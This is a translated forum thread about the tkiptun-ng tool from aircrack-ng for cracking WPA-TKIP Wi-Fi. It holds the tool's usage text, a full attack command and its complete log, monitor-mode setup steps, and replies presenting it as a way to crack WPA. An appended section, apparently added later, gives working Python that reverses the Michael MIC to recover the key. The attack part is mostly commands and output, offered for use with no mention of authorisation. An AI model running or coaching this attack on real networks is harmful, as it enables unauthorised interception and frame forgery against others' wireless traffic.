Usage notes for the WPA-TKIP terminator tool in Aircrack-ng (WPA has been broken)
This post was last edited by dangdidiqq on 2011-5-24 23:28.

Usage: tkiptun-ng <options> <replay interface>

Filter options:
  -d dmac   : MAC address, Destination
  -s smac   : MAC address, Source
  -m len    : minimum packet length
  -n len    : maximum packet length
  -t tods   : frame control, To DS bit
  -f fromds : frame control, From DS bit
  -D        : disable AP detection

Replay attack options:
  -x nbpps  : number of packets per second
  -a bssid  : set Access Point MAC address
  -c dmac   : set Destination MAC address
  -h smac   : set Source MAC address
  -F        : choose first matching packet
  -e essid  : set target AP SSID

Debug options:
  -K prga   : keystream for continuation
  -y file   : keystream-file for continuation
  -j        : inject FromDS packets
  -P pmk    : pmk for verification/vuln testing
  -p psk    : psk to calculate pmk with essid

Source options:
  -i iface  : capture packets from this interface
  -r file   : extract packets from this pcap file

  --help    : Displays this usage screen
This tool is called tkiptun-ng. It was first added in aircrack-ng 1.0 rc2, but at that time it was not mature and did not really work.
This tool cracks WPA-TKIP encryption, and requires the router to have QoS enabled (bandwidth limiting, traffic control, protocol control and so on; old routers do not support this feature).
Anyone with some basics should be able to follow it. I have not used it myself, because I don't have this kind of AP here.
The complete tool is attached for download. Someone on the forum already posted the Linux version; here I'm adding the Windows version.
The Windows version's toolset is very complete, including monitoring, attacking and cracking, exactly the same as in Linux, but it is missing the most critical piece, the "driver". I'm pointing this out in the hope that someone can develop the driver, so we no longer have to go to the trouble of switching between two systems.
Thanks for sharing, good stuff!!!!

Input:
tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0
Output:
The interface MAC (00:0E:2E:C5:81:D3) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
15:06:48  Michael Test: Successful
15:06:48  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
15:06:48  Found specified AP
15:06:48  Sending 4 directed DeAuth. STMAC: [ 0| 0 ACKs]
15:06:54  Sending 4 directed DeAuth. STMAC: [ 0| 0 ACKs]
15:06:56  WPA handshake: 00:14:6C:7E:40:80 captured
15:06:56  Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0305-150705.cap
15:07:05  Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0305-150705.cap
15:07:05  Got the answer!
15:07:05  Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
15:07:25  Offset   99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in  84468ms
15:08:32  Offset   98 ( 1% done) | xor = AE | pt = 80 |  64 frames written in  52489ms
15:09:45  Offset   97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms
15:11:05  Offset   96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms
15:12:07  Offset   95 ( 6% done) | xor = 27 | pt = 02 |  21 frames written in  17221ms
15:13:11  Offset   94 ( 8% done) | xor = D8 | pt = AB |  41 frames written in  33625ms
15:14:12  Offset   93 (10% done) | xor = 94 | pt = 62 |  13 frames written in  10666ms
15:15:24  Offset   92 (11% done) | xor = DF | pt = 68 | 112 frames written in  91829ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:18:13  Offset   91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 391139ms
15:19:32  Offset   90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 152520ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:22:09  Offset   89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:26:10  Offset   88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 490361ms
15:27:33  Offset   87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms
15:28:38  Offset   86 (21% done) | xor = 67 | pt = 00 |  47 frames written in  38537ms
15:29:53  Offset   85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms
15:31:16  Offset   84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms
15:32:23  Offset   83 (26% done) | xor = 28 | pt = 00 |  75 frames written in  61499ms
15:33:38  Offset   82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms
15:34:40  Offset   81 (30% done) | xor = 02 | pt = 00 |  19 frames written in  15584ms
15:35:57  Offset   80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms
15:37:13  Offset   79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms
15:38:21  Offset   78 (35% done) | xor = 71 | pt = 00 |  84 frames written in  68872ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:40:55  Offset   77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:43:31  Offset   76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms
15:44:37  Offset   75 (40% done) | xor = 79 | pt = 00 |  61 frames written in  50021ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:47:05  Offset   74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms
15:48:30  Offset   73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms
15:49:49  Offset   72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:52:32  Offset   71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms
15:53:57  Offset   70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 195980ms
Sleeping for 60 seconds.
36 bytes still unknown
ARP Reply
Checking 192.168.x.y
15:54:11  Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66
Saving plaintext in replay_dec-0305-155411.cap
Saving keystream in replay_dec-0305-155411.xor
15:54:11
Completed in 2816s (0.02 bytes/s)
15:54:11  AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42
15:54:11  Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112
15:54:11  Sent encrypted tkip ARP request to the client.
15:54:11  Wait for the mic countermeasure timeout of 60 seconds.

Good post, this can crack WPA.

First, three preconditions for the attack must be met:
1. The client and the access point must use WPA-TKIP, and the client must be connected.
2. The client and the access point must use IPv4 as their network-layer protocol.
3. A long key renewal interval (rekeying interval) must be configured on the access point. On most modems/wireless routers that use TKIP this interval is set to 3600 seconds by default, which is what makes the attack possible.
With the three points above basically satisfied, what follows is the attack itself.
First, put the wireless card into monitor mode: enter airmon-ng start wlan0. Note that my card's interface is wlan0; the interface name differs from card to card, and you can check it with ifconfig -a.
After entering it, the output is as follows:
PID Name
2954 dhcpcd

Interface Chipset Driver

wlan0 RTL8187 r8187 (monitor mode enabled)

Actually cracking WPA encryption is very simple.

Why is it all garbled? Where did you copy this from?

Bumping this.

I'm diving in, splash, splash.

I'd like to learn to use this, but isn't it too expensive?

Er, just learning.

Don't let it sink, don't let it sink.
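As an added example that is not part of this thread and not aircrack-ng's own code: the line "Reversed MIC Key (FromDS)" in the tkiptun-ng log above is the Beck-Tews step in which the Michael MIC key is computed backwards from a recovered plaintext and its MIC. Michael's round function is a bijection on its two 32-bit state words, so once chopchop has revealed the full plaintext of one MSDU together with its 8-byte MIC, nothing stops you from running the rounds in reverse to obtain the 64-bit key for that direction. The Python below is my own implementation of Michael, its inverse and the recovery; the only external data is the standard's first Michael test vector (all-zero key, empty message). The MIC key and the AP/client MACs are taken from the log above purely as sample values, and the ARP-shaped payload is constructed, not captured.

```python
import struct

MASK = 0xFFFFFFFF


def rol32(v, n):
    """Rotate a 32-bit word left by n bits."""
    return ((v << n) | (v >> (32 - n))) & MASK


def ror32(v, n):
    """Rotate a 32-bit word right by n bits."""
    return ((v >> n) | (v << (32 - n))) & MASK


def xswap(v):
    """Swap the two bytes inside each 16-bit half: bytes ABCD -> BADC."""
    return ((v & 0xFF00FF00) >> 8) | ((v & 0x00FF00FF) << 8)


def block(l, r):
    """One Michael round, the 'b' function of IEEE 802.11 TKIP."""
    r ^= rol32(l, 17)
    l = (l + r) & MASK
    r ^= xswap(l)
    l = (l + r) & MASK
    r ^= rol32(l, 3)
    l = (l + r) & MASK
    r ^= ror32(l, 2)
    l = (l + r) & MASK
    return l, r


def block_inverse(l, r):
    """Undo block(): every step is a bijection, so run them in reverse order."""
    l = (l - r) & MASK
    r ^= ror32(l, 2)
    l = (l - r) & MASK
    r ^= rol32(l, 3)
    l = (l - r) & MASK
    r ^= xswap(l)
    l = (l - r) & MASK
    r ^= rol32(l, 17)
    return l, r


def michael_pad(msg):
    """Append 0x5a and 4..7 zero bytes so the length is a multiple of 4."""
    padded = msg + b"\x5a" + b"\x00" * 4
    return padded + b"\x00" * (-len(padded) % 4)


def michael_mic(key, msg):
    """Michael MIC of msg under a 64-bit key; key and MIC are little-endian."""
    l, r = struct.unpack("<II", key)
    for (word,) in struct.iter_unpack("<I", michael_pad(msg)):
        l ^= word
        l, r = block(l, r)
    return struct.pack("<II", l, r)


def michael_recover_key(msg, mic):
    """Beck-Tews key reversal: from a known plaintext and its MIC, walk backwards."""
    l, r = struct.unpack("<II", mic)
    words = [w for (w,) in struct.iter_unpack("<I", michael_pad(msg))]
    for word in reversed(words):
        l, r = block_inverse(l, r)
        l ^= word
    return struct.pack("<II", l, r)


def tkip_mic_input(da, sa, priority, payload):
    """TKIP feeds Michael with DA || SA || priority || 3 zero bytes || MSDU data."""
    return da + sa + bytes([priority]) + b"\x00" * 3 + payload


def demo():
    """Constructed scenario: the MIC key tkiptun-ng printed above, the AP and
    client MACs from the same log, and a made-up ARP-reply-shaped payload."""
    mic_key = bytes.fromhex("c39510048f8d6c66")   # value from the log, used only as a sample
    da = bytes.fromhex("000fb5abcb9d")            # client MAC (FromDS: AP -> client)
    sa = bytes.fromhex("0040f477f09b")            # AP MAC
    payload = bytes.fromhex("aaaa030000000806"    # LLC/SNAP header + ARP ethertype
                            "0001080006040002")   # ARP header, opcode = reply (constructed)
    msg = tkip_mic_input(da, sa, 0, payload)
    mic = michael_mic(mic_key, msg)               # what the AP would have attached
    recovered = michael_recover_key(msg, mic)     # what the attacker gets back
    return mic, recovered


if __name__ == "__main__":
    mic, recovered = demo()
    print("MIC           :", mic.hex())
    print("recovered key :", ":".join(f"{b:02X}" for b in recovered))
```

In the real attack the plaintext and MIC are not given for free: the "Offset ... xor = ... pt = ..." lines above are chopchop recovering the encrypted frame one byte at a time, and the "Waiting 60 seconds" lines are the tool pacing itself around the AP's MIC countermeasures, which is why each byte costs about a minute. The key recovered this way is only the FromDS (AP to client) Michael key, which is what lets tkiptun-ng forge frames towards the client afterwards.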